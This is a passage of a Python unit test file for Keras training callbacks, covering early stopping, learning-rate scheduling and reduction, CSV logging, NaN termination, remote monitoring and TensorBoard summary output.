hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
  def test_ReduceLROnPlateau(self):
    """ReduceLROnPlateau reduces the LR only when no improvement is seen.

    First run: min_delta=0 over 2 epochs should leave the LR at its initial
    0.1. Second run: min_delta=10 is unreachably large, so the LR is
    reduced by factor=0.1 to 0.01.
    """
    with self.cached_session():
      np.random.seed(1337)
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)

      def make_model():
        # Fixed seeds so both runs start from identical weights/data order.
        random_seed.set_random_seed(1234)
        np.random.seed(1337)
        model = testing_utils.get_small_sequential_mlp(
            num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
        model.compile(
            loss='categorical_crossentropy',
            optimizer=gradient_descent.SGD(lr=0.1))
        return model

      # TODO(psv): Make sure the callback works correctly when min_delta is
      # set as 0. Test fails when the order of this callback and assertion is
      # interchanged.
      model = make_model()
      cbks = [
          keras.callbacks.ReduceLROnPlateau(
              monitor='val_loss',
              factor=0.1,
              min_delta=0,
              patience=1,
              cooldown=5)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=2,
          verbose=0)
      self.assertAllClose(
          float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)

      model = make_model()
      # This should reduce the LR after the first epoch (due to high epsilon).
      cbks = [
          keras.callbacks.ReduceLROnPlateau(
              monitor='val_loss',
              factor=0.1,
              min_delta=10,
              patience=1,
              cooldown=5)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=2,
          verbose=2)
      self.assertAllClose(
          float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
  def test_CSVLogger(self):
    """CSVLogger writes, appends to, and reuses a log file correctly.

    Verifies the custom separator is honored, that `append=True` skips the
    header on an existing file, and that reusing the same callback object
    across `fit` calls keeps exactly one header line in the output.
    """
    with self.cached_session():
      np.random.seed(1337)
      temp_dir = self.get_temp_dir()
      self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
      filepath = os.path.join(temp_dir, 'log.tsv')

      sep = '\t'
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)
      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)

      def make_model():
        np.random.seed(1337)
        model = testing_utils.get_small_sequential_mlp(
            num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
        model.compile(
            loss='categorical_crossentropy',
            optimizer=gradient_descent.SGD(lr=0.1),
            metrics=['accuracy'])
        return model

      # case 1, create new file with defined separator
      model = make_model()
      cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1,
          verbose=0)

      assert os.path.exists(filepath)
      with open(filepath) as csvfile:
        dialect = csv.Sniffer().sniff(csvfile.read())
      assert dialect.delimiter == sep
      del model
      del cbks

      # case 2, append data to existing file, skip header
      model = make_model()
      cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1,
          verbose=0)

      # case 3, reuse of CSVLogger object
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=2,
          verbose=0)

      with open(filepath) as csvfile:
        list_lines = csvfile.readlines()
        # Each row has 5 columns -> 4 separators per line.
        for line in list_lines:
          assert line.count(sep) == 4
        # 1 header line + 4 total epochs of data across the three fits.
        assert len(list_lines) == 5
        output = ' '.join(list_lines)
        # The header ('epoch', ...) must appear exactly once despite appends.
        assert len(re.findall('epoch', output)) == 1

      os.remove(filepath)
  def test_stop_training_csv(self):
    # Test that using the CSVLogger callback with the TerminateOnNaN callback
    # does not result in invalid CSVs.
    np.random.seed(1337)
    tmpdir = self.get_temp_dir()
    self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)

    with self.cached_session():
      fp = os.path.join(tmpdir, 'test.csv')
      (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
          train_samples=TRAIN_SAMPLES,
          test_samples=TEST_SAMPLES,
          input_shape=(INPUT_DIM,),
          num_classes=NUM_CLASSES)

      y_test = keras.utils.to_categorical(y_test)
      y_train = keras.utils.to_categorical(y_train)
      cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
      model = keras.models.Sequential()
      for _ in range(5):
        model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
      model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
      model.compile(loss='mean_squared_error',
                    optimizer='rmsprop')

      def data_generator():
        # Yields real batches first, then all-NaN batches once `tot` exceeds
        # 3 * len(x_train), forcing TerminateOnNaN to fire mid-training.
        i = 0
        max_batch_index = len(x_train) // BATCH_SIZE
        tot = 0
        while 1:
          if tot > 3 * len(x_train):
            yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
                   np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
          else:
            yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
                   y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
          i += 1
          tot += 1
          i %= max_batch_index

      # NOTE(review): `fit_generator` is a legacy API; `fit` accepts
      # generators in newer TF versions.
      history = model.fit_generator(data_generator(),
                                    len(x_train) // BATCH_SIZE,
                                    validation_data=(x_test, y_test),
                                    callbacks=cbks,
                                    epochs=20)
      loss = history.history['loss']
      assert len(loss) > 1
      assert loss[-1] == np.inf or np.isnan(loss[-1])

      values = []
      with open(fp) as f:
        # Parse the CSV the logger wrote; it must remain well-formed even
        # though training was terminated early.
        for x in csv.reader(f):
          # In windows, due to \r\n line ends we may end up reading empty lines
          # after each line. Skip empty lines.
          if x:
            values.append(x)
      assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
#   logdir: str. The logdir of the FileWriter to which the summary was
#     written.
#   tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
  """Read all summaries under the logdir into a `_SummaryFile`.

  Args:
    logdir: A path to a directory that contains zero or more event
      files, either as direct children or in transitive subdirectories.
      Summaries in these events must only contain old-style scalars,
      images, and histograms. Non-summary events, like `graph_def`s, are
      ignored.

  Returns:
    A `_SummaryFile` object reflecting all summaries written to any
    event files in the logdir or any of its descendant directories.

  Raises:
    ValueError: If an event file contains a summary of unexpected kind.
  """
  result = _SummaryFile()
  # Dispatch table from the `value` oneof field name to the target bucket.
  buckets = {
      'simple_value': result.scalars,
      'image': result.images,
      'histo': result.histograms,
      'tensor': result.tensors,
  }
  for dirpath, _, filenames in os.walk(logdir):
    event_paths = [
        os.path.join(dirpath, name)
        for name in filenames
        if name.startswith('events.out.')
    ]
    for path in event_paths:
      for event in summary_iterator.summary_iterator(path):
        if not event.summary:  # e.g. a `graph_def` event
          continue
        for value in event.summary.value:
          # Case on the `value` rather than the summary metadata because
          # the Keras callback uses `summary_ops_v2` to emit old-style
          # summaries. See b/124535134.
          kind = value.WhichOneof('value')
          if kind not in buckets:
            raise ValueError(
                'Unexpected summary kind %r in event file %s:\n%r'
                % (kind, path, event))
          buckets[kind].add(_ObservedSummary(logdir=dirpath, tag=value.tag))
  return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/uve/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, dirnames, filenames) in os.walk(self.logdir):
del dirnames # unused
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
  def test_TensorBoard_weight_images(self):
    """write_images=True should additionally emit image summaries per weight."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, write_images=True)
    model_type = testing_utils.get_model_type()
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars,
        {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        },
    )
    self.assertEqual(
        self._strip_layer_names(summary_file.histograms, model_type),
        {
            _ObservedSummary(logdir=self.train_dir, tag='bias_0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
        },
    )
    # The kernel produces multiple image slices; the bias only one.
    self.assertEqual(
        self._strip_layer_names(summary_file.images, model_type),
        {
            _ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
        },
    )
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
  def test_TensorBoard_invalid_argument(self):
    """Misspelled keyword args (here 'wwrite_images') must raise ValueError."""
    with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
      keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
  """TensorBoard V2 tests that build their own models instead of using the
  parameterized model factory (graph writing and profiler auto-tracing)."""
  def setUp(self):
    super(TestTensorBoardV2NonParameterizedTest, self).setUp()
    # Expected run subdirectories created by the TensorBoard callback.
    self.logdir = os.path.join(self.get_temp_dir(), 'tb')
    self.train_dir = os.path.join(self.logdir, 'train')
    self.validation_dir = os.path.join(self.logdir, 'validation')
  def _get_seq_model(self):
    """Build and compile a small Conv2D->Flatten->Dense Sequential model."""
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    opt = gradient_descent.SGD(learning_rate=0.001)
    model.compile(
        opt,
        'mse',
        run_eagerly=testing_utils.should_run_eagerly(),
        experimental_run_tf_function=testing_utils.should_run_tf_function())
    return model
  def fitModelAndAssertKerasModelWritten(self, model):
    """Fit `model` with graph writing on and assert a 'keras' tensor summary
    was recorded in the train run (the serialized Keras model graph)."""
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir,
                                         write_graph=True,
                                         profile_batch=0)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag='keras'),
        },
    )
  def test_TensorBoard_writeSequentialModel_noInputShape(self):
    """Graph writing works for a deferred-build Sequential model."""
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)
  def test_TensorBoard_writeSequentialModel_withInputShape(self):
    """Graph writing works for a Sequential model with a known input shape."""
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)
  def test_TensoriBoard_writeModel(self):
    # NOTE(review): method name has a typo ('TensoriBoard'); renaming would
    # change which tests the framework discovers, so it is left as-is here.
    """Graph writing works for a functional-API model."""
    inputs = keras.layers.Input([10, 10, 1])
    x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
    x = keras.layers.Flatten()(x)
    x = keras.layers.Dense(1)(x)
    model = keras.models.Model(inputs=inputs, outputs=[x])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)
  def test_TensorBoard_autoTrace(self):
    """profile_batch=1 records a trace tagged with that batch number."""
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
        },
    )
  def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
    """The trace tag follows the profiled batch index (batch_2 here)."""
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
        },
    )
  def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
    """A profile_batch beyond the run's batch count records no trace."""
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    # Enabled trace only on the 10000th batch, thus it should be empty.
    self.assertEmpty(summary_file.tensors)
class MostRecentlyModifiedFileMatchingPatternTest(test.TestCase):
  """Tests for ModelCheckpoint._get_most_recently_modified_file_matching_pattern."""
  def test_get_most_recently_modified_file_matching_pattern(self):
    """The newest file (by mtime) matching the pattern is returned."""
    file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
    test_dir = self.get_temp_dir()
    path_pattern = os.path.join(test_dir, file_pattern)
    file_paths = [
        os.path.join(test_dir, file_name) for file_name in
        ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
    ]
    for file_path in file_paths:
      with open(file_path, 'w') as f:
        # Ensure there are some intervals between file creation.
        time.sleep(2)
        f.write('foo bar')
    # Ensure the files have been actually written.
    self.assertEqual(
        set([
            os.path.join(test_dir, file_name)
            for file_name in os.listdir(test_dir)
        ]), set(file_paths))
    # The last file written has the newest mtime, regardless of batch/epoch
    # numbers embedded in the name.
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(None)
        ._get_most_recently_modified_file_matching_pattern(path_pattern),
        file_paths[-1])
  def test_some_file_not_matching_pattern(self):
    """Files that do not match the pattern ('baatch') are ignored."""
    file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
    test_dir = self.get_temp_dir()
    path_pattern = os.path.join(test_dir, file_pattern)
    file_paths = [
        os.path.join(test_dir, file_name) for file_name in
        ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
    ]
    for file_path in file_paths:
      with open(file_path, 'w') as f:
        # Ensure there are some intervals between file creation.
        time.sleep(2)
        f.write('foo bar')
    # The newest file does not match the pattern, so the second-newest wins.
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(None)
        ._get_most_recently_modified_file_matching_pattern(path_pattern),
        file_paths[-2])
  def test_get_same_file_if_file_name_equals_pattern(self):
    """A literal (placeholder-free) pattern matches its own file."""
    file_name = 'f.batch02.h5'
    test_dir = self.get_temp_dir()
    file_path = os.path.join(test_dir, file_name)
    with open(file_path, 'w') as f:
      f.write('foo bar')
    self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(
            None)._get_most_recently_modified_file_matching_pattern(file_path),
        file_path)
  def test_get_none_if_file_does_not_exist(self):
    """No matching file on disk yields None."""
    file_name = 'f.batch02.h5'
    test_dir = self.get_temp_dir()
    file_path = os.path.join(test_dir, file_name)
    self.assertLen(os.listdir(test_dir), 0)
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(
            None)._get_most_recently_modified_file_matching_pattern(file_path),
        None)
  def test_using_checkpoint_management_latest_checkpoint(self):
    """A checkpoint registered with checkpoint_management wins over mtime."""
    file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
    ckpt_file_name = 'f.batchXepochY'
    test_dir = self.get_temp_dir()
    path_pattern = os.path.join(test_dir, file_pattern)
    ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
    with open(ckpt_file_path, 'w') as f:
      f.write('dummy ckpt')
    checkpoint_management.update_checkpoint_state_internal(
        test_dir, ckpt_file_path)
    file_paths = [
        os.path.join(test_dir, file_name)
        for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
    ]
    for file_path in file_paths:
